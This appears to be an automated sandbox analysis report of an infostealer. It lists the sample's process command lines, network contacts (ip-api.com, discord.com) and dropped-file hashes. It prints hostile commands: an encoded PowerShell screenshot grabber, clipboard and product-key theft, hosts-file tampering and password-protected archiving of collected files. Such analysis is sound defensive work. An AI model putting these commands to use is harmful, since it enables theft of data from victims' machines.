4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp" "c:\Users\Admin\AppData\Local\Temp\x5xeol1u\CSC93BD618D8B734D548C40C38081E279FF.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\geNAr.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\geNAr.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 blank-4bg2h.in udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 73.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI49922\python311.dll

MD5 ccdbd8027f165575a66245f8e9d140de
SHA1 d91786422ce1f1ad35c528d1c4cd28b753a81550
SHA256 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971
SHA512 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311

C:\Users\Admin\AppData\Local\Temp\_MEI49922\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/212-25-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI49922\base_library.zip

MD5 4b011f052728ae5007f9ec4e97a4f625
SHA1 9d940561f08104618ec9e901a9cd0cd13e8b355d
SHA256 c88cd8549debc046a980b0be3bf27956ae72dcdcf1a448e55892194752c570e6
SHA512 be405d80d78a188a563086809c372c44bcd1ccab5a472d50714f559559795a1df49437c1712e15eb0403917c7f6cfaf872d6bb0c8e4dd67a512c2c4a5ae93055

C:\Users\Admin\AppData\Local\Temp\_MEI49922\_ctypes.pyd

MD5 343e1a85da03e0f80137719d48babc0f
SHA1 0702ba134b21881737585f40a5ddc9be788bab52
SHA256 7b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664
SHA512 1b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8

C:\Users\Admin\AppData\Local\Temp\_MEI49922\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI49922\_ssl.pyd

MD5 e5f6bff7a8c2cd5cb89f40376dad6797
SHA1 b854fd43b46a4e3390d5f9610004010e273d7f5f
SHA256 0f8493de58e70f3520e21e05d78cfd6a7fcde70d277e1874183e2a8c1d3fb7d5
SHA512 5b7e6421ad39a61dabd498bd0f7aa959a781bc82954dd1a74858edfea43be8e3afe3d0cacb272fa69dc897374e91ea7c0570161cda7cc57e878b288045ee98d9

memory/212-48-0x00007FFA00EE0000-0x00007FFA00EEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI49922\_sqlite3.pyd

MD5 a9d2c3cf00431d2b8c8432e8fb1feefd
SHA1 1c3e2fe22e10e1e9c320c1e6f567850fd22c710c
SHA256 aa0611c451b897d27dd16236ce723303199c6eacfc82314f342c7338b89009f3
SHA512 1b5ada1dac2ab76f49de5c8e74542e190455551dfd1dfe45c9ccc3edb34276635613dbcfadd1e5f4383a0d851c6656a7840c327f64b50b234f8fdd469a02ef73

C:\Users\Admin\AppData\Local\Temp\_MEI49922\_socket.pyd

MD5 2957b2d82521ed0198851d12ed567746
SHA1 ad5fd781490ee9b1ad2dd03e74f0779fb5f9afc2
SHA256 1e97a62f4f768fa75bac47bba09928d79b74d84711b6488905f8429cd46f94a2
SHA512 b557cf3fe6c0cc188c6acc0a43b44f82fcf3a6454f6ed7a066d75da21bb11e08cfa180699528c39b0075f4e79b0199bb05e57526e8617036411815ab9f406d35

C:\Users\Admin\AppData\Local\Temp\_MEI49922\_queue.pyd

MD5 0e5997263833ce8ce8a6a0ec35982a37
SHA1 96372353f71aaa56b32030bb5f5dd5c29b854d50
SHA256 0489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e
SHA512 a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f

C:\Users\Admin\AppData\Local\Temp\_MEI49922\_lzma.pyd

MD5 932147ac29c593eb9e5244b67cf389bb
SHA1 3584ff40ab9aac1e557a6a6009d10f6835052cde
SHA256 bde9bccb972d356b8de2dc49a4d21d1b2f9711bbc53c9b9f678b66f16ca4c5d3
SHA512 6e36b8d8c6dc57a0871f0087757749c843ee12800a451185856a959160f860402aa16821c4ea659ea43be2c44fcdb4df5c0f889c21440aceb9ee1bc57373263c

C:\Users\Admin\AppData\Local\Temp\_MEI49922\_hashlib.pyd

MD5 d71df4f6e94bea5e57c267395ad2a172
SHA1 5c82bca6f2ce00c80e6fe885a651b404052ac7d0
SHA256 8bc92b5a6c1e1c613027c8f639cd8f9f1218fc4f7d5526cfcb9c517a2e9e14c2
SHA512 e794d9ae16f9a2b0c52e0f9c390d967ba3287523190d98279254126db907ba0e5e87e5525560273798cc9f32640c33c8d9f825ff473524d91b664fe91e125549

C:\Users\Admin\AppData\Local\Temp\_MEI49922\_decimal.pyd

MD5 8b623d42698bf8a7602243b4be1f775d
SHA1 f9116f4786b5687a03c75d960150726843e1bc25
SHA256 7c2f0a65e38179170dc69e1958e7d21e552eca46fcf62bbb842b4f951a86156c
SHA512 aa1b497629d7e57b960e4b0ab1ea3c28148e2d8ebd02905e89b365f508b945a49aacfbd032792101668a32f8666f8c4ef738de7562979b7cf89e0211614fa21a

C:\Users\Admin\AppData\Local\Temp\_MEI49922\_bz2.pyd

MD5 3bd0dd2ed98fca486ec23c42a12978a8
SHA1 63df559f4f1a96eb84028dc06eaeb0ef43551acd
SHA256 6beb733f2e27d25617d880559299fbebd6a9dac51d6a9d0ab14ae6df9877da07
SHA512 9ffa7da0e57d98b8fd6b71bc5984118ea0b23bf11ea3f377dabb45b42f2c8757216bc38ddd05b50c0bc1c69c23754319cef9ffc662d4199f7c7e038a0fb18254

C:\Users\Admin\AppData\Local\Temp\_MEI49922\unicodedata.pyd

MD5 bc28491251d94984c8555ed959544c11
SHA1 964336b8c045bf8bb1f4d12de122cfc764df6a46
SHA256 f308681ef9c4bb4ea6adae93939466df1b51842554758cb2d003131d7558edd4
SHA512 042d072d5f73fe3cd59394fc59436167c40b4e0cf7909afcad1968e0980b726845f09bf23b4455176b12083a91141474e9e0b7d8475afb0e3de8e1e4dbad7ec0

C:\Users\Admin\AppData\Local\Temp\_MEI49922\sqlite3.dll

MD5 74b347668b4853771feb47c24e7ec99b
SHA1 21bd9ca6032f0739914429c1db3777808e4806b0
SHA256 5913eb3f3d237632c2f0d6e32ca3e993a50b348033bb6e0da8d8139d44935f9e
SHA512 463d8864ada5f21a70f8db15961a680b00ee040a41ea660432d53d0ee3ccd292e6c11c4ec52d1d848a7d846ad3caf923cbc38535754d65bbe190e095f5acb8c3

C:\Users\Admin\AppData\Local\Temp\_MEI49922\select.pyd

MD5 e021cf8d94cc009ff79981f3472765e7
SHA1 c43d040b0e84668f3ae86acc5bd0df61be2b5374
SHA256 ab40bf48a6db6a00387aece49a03937197bc66b4450559feec72b6f74fc4d01e
SHA512 c5ca57f8e4c0983d9641412e41d18abd16fe5868d016a5c6e780543860a9d3b37cc29065799951cb13dc49637c45e02efb6b6ffeaf006e78d6ce2134eb902c67

C:\Users\Admin\AppData\Local\Temp\_MEI49922\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI49922\libssl-3.dll

MD5 264be59ff04e5dcd1d020f16aab3c8cb
SHA1 2d7e186c688b34fdb4c85a3fce0beff39b15d50e
SHA256 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d
SHA512 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

C:\Users\Admin\AppData\Local\Temp\_MEI49922\libcrypto-3.dll

MD5 7f1b899d2015164ab951d04ebb91e9ac
SHA1 1223986c8a1cbb57ef1725175986e15018cc9eab
SHA256 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986
SHA512 ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

C:\Users\Admin\AppData\Local\Temp\_MEI49922\blank.aes

MD5 a18a2670024e849f0c6219103fb6dd3f
SHA1 a8d9f28c53612a702fee403ddb0608e15c522a82
SHA256 65e6583d8708ec9633a53e7aaf93ce91d38ba4296c7b7480f49c237ab50e93e8
SHA512 6a1f0f76287c2a275fc10bf97941e03da7908215a408d41e3f680534e8ff5973421f8ce662812eddb19aecf122230f5c83562b7c02897dd009a12da41437d16e

memory/212-30-0x00007FFA00170000-0x00007FFA00194000-memory.dmp

memory/212-56-0x00007FF9FB0D0000-0x00007FF9FB0E9000-memory.dmp

memory/212-55-0x00007FF9FB0F0000-0x00007FF9FB11D000-memory.dmp

memory/212-58-0x00007FF9FB020000-0x00007FF9FB043000-memory.dmp

memory/212-60-0x00007FF9EB5D0000-0x00007FF9EB74E000-memory.dmp

memory/212-62-0x00007FF9FB000000-0x00007FF9FB019000-memory.dmp

memory/212-64-0x00007FF9FDA50000-0x00007FF9FDA5D000-memory.dmp

memory/212-66-0x00007FF9ECA00000-0x00007FF9ECA33000-memory.dmp

memory/212-68-0x00007FF9EAF40000-0x00007FF9EB00D000-memory.dmp

memory/212-71-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp

memory/212-74-0x00007FFA00170000-0x00007FFA00194000-memory.dmp

memory/212-73-0x000001883C400000-0x000001883C929000-memory.dmp

memory/212-72-0x00007FF9EAA10000-0x00007FF9EAF39000-memory.dmp

memory/212-78-0x00007FF9FD960000-0x00007FF9FD96D000-memory.dmp

memory/212-77-0x00007FF9FA620000-0x00007FF9FA634000-memory.dmp

memory/212-80-0x00007FF9EB820000-0x00007FF9EB93C000-memory.dmp

memory/212-81-0x00007FF9FB020000-0x00007FF9FB043000-memory.dmp

memory/3680-82-0x00007FF9E9F43000-0x00007FF9E9F45000-memory.dmp

memory/3680-89-0x0000019DB4530000-0x0000019DB4552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_moa0a5b4.yuz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3680-93-0x00007FF9E9F40000-0x00007FF9EAA01000-memory.dmp

memory/3680-103-0x00007FF9E9F40000-0x00007FF9EAA01000-memory.dmp

memory/5052-106-0x000001E83E600000-0x000001E83E81C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/3680-111-0x00007FF9E9F40000-0x00007FF9EAA01000-memory.dmp

memory/3680-110-0x0000019DB3920000-0x0000019DB3B3C000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.cmdline

MD5 5aca8f778004cd7fa853d33dc2295ce2
SHA1 0b409dbb92365052cf8143cfa1d8787b80738d1d
SHA256 ff49246896042fa495c1365a12ba0fe7d49d4e969d7bad6e9641f0b401107434
SHA512 d483801eea5fae838782ceded1f75916a09c360a19fcc8edbd950c7a94851f66c9ea544bbdfaac3c678dea051106955049c5219e7090e6bf0d4fcacdcdd79054

\??\c:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\x5xeol1u\CSC93BD618D8B734D548C40C38081E279FF.TMP

MD5 a6ed6e280395471274138461e3aa9ace
SHA1 e7e52f19db47f5ac819123a68a34a7f5dd9af782
SHA256 d455c3379af9addaef1edc7fb297bf2f9144aa653de553b2a7e521614f8ecdee
SHA512 68d3998a55cd2866ebfeb334a4839687934be6c35e06098148a9cccfa64433c0b46515a0c01255f0d710fc3d09caa2b3569253935dfa7a2dadf82a13675ae320

C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp

MD5 8a650c6ed51a264fe09b85da8b3ac265
SHA1 a9e83a49d5cc0c2c0cf52ddcece2c289c5f7bbb7
SHA256 1cb5178fd915d9a8a887b3bfed03a27e76ed744823546c803620c86641ac67d3
SHA512 04068999550faaf04a7b3e5095e86edf56d086ea94f81f0d9820c0f11869f72568ad373666d5071728c1f92aeab51e588103dbf889cb9a6b4dbcffa07e4a442b

memory/2124-146-0x0000022375D60000-0x0000022375D68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.dll

MD5 8a97c86db275dfee8d1ab5f458efd4f5
SHA1 7a6824349ee7c7e63216783d07688ff641cbdcc4
SHA256 46831cfd2bcfc2450443a6a39e455bb0ba19259c558398c5490ad7b057023a83
SHA512 0a38f3ba09d99ee5a3f4a5271f2f1f9015ccfc3cb69cf62c67535590d9bb7e7a2bc6bb39086ddc766ff3d35cc58f1921018668374a9a5e9c89c233263e28c62b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a7753640b549244dafbbbc068e9bc5b
SHA1 973287b37dd2c8ef662db9829ec82205793e8e78
SHA256 a700ed9ed24158a89ecb35d49e0ea31f83ba123073ed07f35f990242e1a00799
SHA512 0fed225e1fb142050cd8db3a1c104d0fa72c74d673bdc3b3e9259526159c24478d255098c7bd798d936077727ea8c46e4456c393beba66b831724945a573e54b

memory/212-158-0x00007FF9EB5D0000-0x00007FF9EB74E000-memory.dmp

memory/212-160-0x00007FF9FB000000-0x00007FF9FB019000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\   ​  ‎   \Directories\Desktop.txt

MD5 a7a69c07210cd16f58317024cd9522c4
SHA1 6759bb504507f003ba4c18a291970e6dce1dd3cb
SHA256 771a0452f3c08c440a87a46e8325ae3861454d063e71ffb9a07bb65f57e8eb59
SHA512 92a4059978eec74dbc398ea5d935af916d546afc5ad6df1881343e4084ccee51433faf8baf7e99c7a00d18313e60241c86de9495a1e44cfd1cb155a10f30278b

